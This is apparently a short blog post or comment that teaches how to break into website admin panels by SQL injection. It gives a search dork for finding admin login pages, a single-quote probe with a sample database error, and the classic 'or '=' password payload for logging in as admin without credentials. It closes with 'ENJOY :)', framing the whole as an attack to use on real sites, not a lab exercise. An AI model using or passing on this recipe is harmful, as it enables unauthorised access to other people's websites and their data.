Old as well as new websites are lacking security and are prone to several loop holes, one such vulnerability is sql injection.
what actually an sql injection is all about and how it be used to provoke a website to access it as an admin to monitor all the tasks and events , without actually knowing its password.
Test for sql injection vulnerability..
Search for Inurl:\ adminlogin
Username: ‘
Password : =
Error:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '='.
/logincheck.asp, line 6
if it returns an error, it could either error 505 or any other sort, just it indicates that it has sql vulnerability.
then here is how you will be able to access its domain ::
Username : admin
Password: ‘or ’ ’=‘
ENJOY :)
ReplyDelete